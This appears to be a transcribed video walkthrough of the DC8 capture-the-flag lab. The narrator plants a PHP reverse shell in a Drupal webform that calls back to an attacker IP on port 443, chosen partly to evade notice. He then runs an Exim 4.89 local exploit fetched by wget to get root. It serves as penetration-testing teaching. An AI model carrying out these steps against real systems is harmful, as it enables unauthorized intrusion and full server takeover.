everybody. Thank you. Welcome back. I think this is video three. Video three in however many videos I'm going to go for. I'm going to shoot for 4 videos in this series and try to keep them as manageable as possible. All right, so last video we cracked the hashes that were presented to us from the SQL database. Now that we have the cracked password, we're going to log in to DC8 server with the user John. All right, and if I remember correctly, it was user login was where we're going to be at, and we are going to use John over here, and this password was turtle. John should know better than to use such a weak password, but good for us. It didn't take that long to crack it. Most of you guys probably have more complex passwords than that, but then again, this is not supposed to be the world's toughest server. All right, so let's go ahead and move on around. Looks like there's a couple of things here. I don't have administrative items. I'm not an administrator. I'm assuming configuration, administration. I'm going to index. Can I do anything in here? All right, no, I am not a Drupal expert, but I'm somewhat wily. All right, let's go ahead and take a look over here. More things to take a look at. All right, nothing new here except for web forms and results. Let's dig on over to web forms and form emails, maybe? Can we do anything with emails? Oh, conditionals. No. Form settings. All right, so form settings. Okay, in form settings, we're taking a look at here, and it looks like we can change or add to this particular template, of what we put in here. So essentially, what we're trying to do is every time somebody submits a form, we can add PHP code to it. So every time somebody submits a form, we can make this server perform an action on the back end they might not be aware of. Okay, now think XSS. Remember, if you guys remember cross-site scripting, persistent and non-persistent, but in this case, we are going to use a reverse shell to get us I guess you can say, terminal access to this particular computer. Now, how do you go about creating a reverse shell? Quite easy, actually. You go on online, you find yourself a reverse PHP shell. There's reverse shells for pretty much everything, but in this particular case, as we know we're using PHP, we are going to use a reverse PHP shell. And what we are going to reverse PHP shell, we can go to Pentest Monkey. You can grab, Pentest Monkey, GitHub. We can grab one here. Let's go ahead and find ourselves one from Pentest Monkey. Here we go. I've been to this one before. Looks like this is the reverse shell here. It even tells us what to modify. We need to modify the IP address and the port and whatever we need to create on our system for listening port. I'll walk you guys through that. I'll walk you guys through that right now. Let's go. If you download this, I've already downloaded this, unzipped it into my downloads folder. So let's go take a look at this particular shell. And then it's in PHP. There you go. Nano PHP reverse shell. Now, always get in the habit, if you're going to use a shell that somebody else created, at least give it a cursory glance to make sure that there's no shenanigans there. That's why you really need to learn how to write at least one shell scripting environment. Bash, Python, Perl, whatever you want. PHP, whatever you want, you should at least have one, or at least have a good idea of what's going on here. Additionally, on top of that, the instructions did say edit this, edit that. Okay, so in this particular case, I've already modified this to call back to 10.0.0.18 on port 443. Okay, great. And this is a rather long shell here. Let's see. Where are you? Where's the meat of it? Where exactly is the meat of the shell? Here we go. Open reverse connection. All right, all those variables that we have stated in the past, IP, port, IP and port, those are the variables that we stated earlier on, are declared there and can run through. This is a little bit overkill for what we need to do. Essentially, what we can do here, we can change this actually from a control X, no, I don't want to save the buffer, into something like this. Now this is a one that I've been using for a while. It's a one-liner shell. Basically, it just opens up a reverse shell to 10.0.0.18.443, and it executes a bin bash, the actual bash shell, and then offers it as such. Okay, so you have your choice. Basically, copy here from this question mark to this question mark, or actually the greater than, less than symbols here. Copy that information, and we can move it on over to here. Paste that bad boy here, and we're all set. Okay, notice here that's going to call back on port 443. Why do I use 443? Well, one, typically 443 is not blocked. Yes, iptables does. iptables, which is a firewall for Linux, sometimes does give problems on the outbound connection. So if I ever given the chance to use 443, I will use it. There is not a conflict on the server because remember when we ran nmap, 443 was not open. Additionally, on top of that, if I was a network administrator and I was looking at traffic, if I was looking at traffic and I was seeing traffic moving across port 443, I really wouldn't think twice of it. That's why I'm using 443. And of course, you can always set whatever port you want. Okay, so let me just go ahead and save this configuration right now. All right, and I'm going to go back home over here. I'm going to go ahead and meta key right to take up half my screen. And what I'm going to do here, I guess I can just go here, and I can just use netcat LVP, L for listen, V for verbose, port is 443. Notice here, now netcat is listening. Netcat is now listening on this port 443, waiting for a connection to occur. So we are going to run the reverse shell script, which will force this server to make an outbound connection to port 443. And we have a netcat on our computer over here. Netcat on our computer over here that is listening to establish that connection. All right, so I'm just going to go ahead and say, you know what? Happy hacker. I don't know why I'm calling it that. 1app2.gmail.com. Oh, by the way, and why? What am I doing this? Because the form, submitting a form, remember, what we don't see here, the code will be appended to the form. So as soon as we submit this, since we modified the web form, as soon as we submit this, this will execute the script. Fantastic. All right. Let's see. We pwd. Okay, great. We are now in var www.html, where this particular server is running out of. I'm gonna go ahead and move out of there. Right, and let's see what we can do here. Now, if I do who am I? Tell me who am I? I am www-data. I am the web server service. If I go into etc. I cat the pass WD. This illustrates all the users on this particular server, servers and users and services. And here I am here. Typically, these services, if you guys remember from my lecture, you never want to have services run as root unless absolutely necessary. Here's www-data. Notice also here, MySQL is also a user, and all that good jazz. We have daemon, we have root in here. Nothing else, nobody else in the system that looks like anybody. Not even John is in here. But yeah. All right, so if I do lsla, hopefully, let's see, lsla pass wd, looks like only root can read and write this file, but everybody else can read it. What about lsla shadow, which is where all the passwords are at? All right, read, write, and read. So read, write, and read the group. The group can read the shadow file. I doubt that I am in the group. I am doubtful that I'm in the group. Cat shadow that can read the shadow file. Additionally, on top of that, I am unable to what do you call it? Get into a root directory. Can I go to home? Not whom, home. All right. Oh, let's go DC8 user. Oh, cool. All right. How about LSLA? Oh, no, can't get it. Bash history is going to dev null. So if I even cat this, cat bash history, there's nothing in here. Nothing in here. That's going to get us. Okay. All right, I'm not going to worry about that. All right, so what actually happens next? We find ourselves in the computer. We're running around. We're running around. What can we do next? Well, one thing that we can do next, let's get into TMP here. One thing that we can do next is what we need to go through a process of privilege escalation. Privilege escalation is the process from going from very little permissions to more permissions, escalating privileges. We can do a horizontal privilege escalation, which is to another user, or a vertical privilege escalation, typically that is admin. We're kind of in a rough spot here because we need to be able to identify how to hack this system. Now, I know a lot of you guys know about privilege escalation, know at least the term of it, but how does it actually happen? All right, well, we need to figure out if we can, oh, damn it, what can we do from SU? Well, we need to find, in this particular case, we need to find programs. We need to find a program or an application that we can run, with a different SU ID, a different SUID as root. Basically, we need to be able to run something as root. And then exploit that. Basically, we are looking for something that is capable of escalating its privileges as root. Okay, so how do we go about doing that? Well, there's a very easy way to do it. You can go ahead and find this /perm us -u equals s2 dev null, moving all. Actually, you know what? Let me just show you what this looks like. All right, so what can we actually use? Well, looks like we're denied permission out of everything here. Out of all of these different things, I'm denied permission to actually execute these. That doesn't do me any good. But if I do find perm u equals s2, and this is like, you know what? If permission is denied, move those to dev null. I only care about the things I can execute. All right. So we move over here. We find ourselves. These are all the SUID, SUIDable. Is that even a word? SUIDable, SUIDable applications that we can run. So we would just evaluate each one for their main purposes over here. Now let's see. Go up all the way to the very top, but you know what? This video is going to get long. The only one I really care about is exim4. All right, so what I'm going to do is try to figure out what version. Okay, so let's just use this. Okay, exim4. All right, so I'm going to do exim4 version. Exim4 version, that is going to be exim version 4.89, and this is for SMTP. SMTP is a service that we have on Unix-like operating systems. And what we can do here on my other computer, okay, searchsploit, find exploits, and this is the part where will probably take you the most time. So if I do searchsploit exim, we're looking for exim version 4.89. 4.89, 4.81 to 4.91, local privilege escalation. Okay, great. 46696 is 46996 is the exploit that we're looking for that fits within these number of things. We're not going to be using Metasploit, but that's built into Metasploit. And then we have a remote execution here, 4.87. 4.91. This looks like it's actually more directed for us. So if you want to find out more about this, you can just go ahead and say searchsploit -x 4646996 is what we're looking for. And let's see here. Flaw was found in exim version 4.87 to 4.91, 4.87, 4.91. Okay, cool. Improper validation of recipient address and deliver message may lead to remote command execution. It is known a common vulnerability exposure. It's known in that one, so if you want to find out more about it, we know more about it. Okay, this is the script, how it's used. I'll show you guys how to use this one particular script. And this is basically how it do. All right, so one thing you need to know, okay, actually, you know what? Search exploit exim. We need to actually move this particular, exploit. And this is built in Linux, guys, by the way. This is at your fingertips. We need to copy this, or copy USR share exploit-db, exploits, Linux, where are you? Local Linux, local as in a local. Oh, by the way, guys, the main category of exploits is local and remote. Local is it's ran on the machine itself. Remote is from someplace else, obviously. Local 46996sh or copy. What am I doing? Copy CP. Actually, will it work? Copy. I've never actually done. CP over here, and we need to move it to a place where we can transfer this script from here to here. Notice we remember it's a local script, so we need to move this machine. Okay, so I'm going to go ahead and move it to var www html. Okay, move that on over there as 46696. Great. What I'm going to do now is move on over to var www html, and here we have a ton. Of different. Payloads that I keep around for whatever reason. All right. So one thing to pro tip here. Most of you guys probably will miss this. We need to run something real quick. DOS to Unix, basically is formatting for this particular script. Sometimes it's a problem. 46696, we just need to convert that over to Unix format. Okay, this will save you some time. And let's go ahead and call this CP or MD 4696 into something else. Let's just call it exim RCE. Okay, let's just call it exim RCESH. LSLA exim RCESH. Okay, looks like over here it does have execute open. Okay, so now we are here in the temp directory. Why am I in the temp directory? Because I can typically write to the temp directory and move from there. Okay, I'm going to use wget. Oh, by the way, we also need to turn on a service or HTTP service Apache2 start. We're going to go ahead and start this service over here. So we have a web server running on our server, and now we can move things around. Now we are going to use a wget command to grab this this shell from this computer to this computer. So wget, let's see, 10.00.18 exim-rce.sh. That's what we're going to move. Okay. All right. All right, here we go. Exim RCE is right there. We're all set. Now, what we need to also do, based on the script, is we also need, for this particular script, let's go ahead and create, let's create a listening port on this computer, on my computer again. Netcat LVP 4444 sure. That's my favorite one. And we need to execute this script over on here. As you can see, this is the easiest way to do it is bash exim exim rcesh-m -m netcat. If you read the script, this would be the verbiage for it. I'm going to go ahead and run that right now. All right, so I need to use netcat again to present or execute a code, which is going to be bin bash 10.00.18 on port 4444. Let's go ahead and move that over here. Who am I? I am now root. Go to root directory, cat flag.txt, and we have gotten ourselves root access to this machine, and we can just do whatever we want until the end of time. Okay, so you know what? I kind of like this, but I'm going to go ahead and do one more video, guys, where we're going to do one more video where we deal with using Metasploit. Metasploit as well. Yeah, let's do Metasploit, but you guys kind of get the hint. If you guys have any questions, comments, or concerns, let me know. We'll talk about it. We'll discuss, collaborate. All right, if you learned something, like, share, and subscribe, and we'll be back with more episodes. And if you guys want a particular CTF done, let me know. I can definitely do that for you. All right, take it easy, guys. Bye.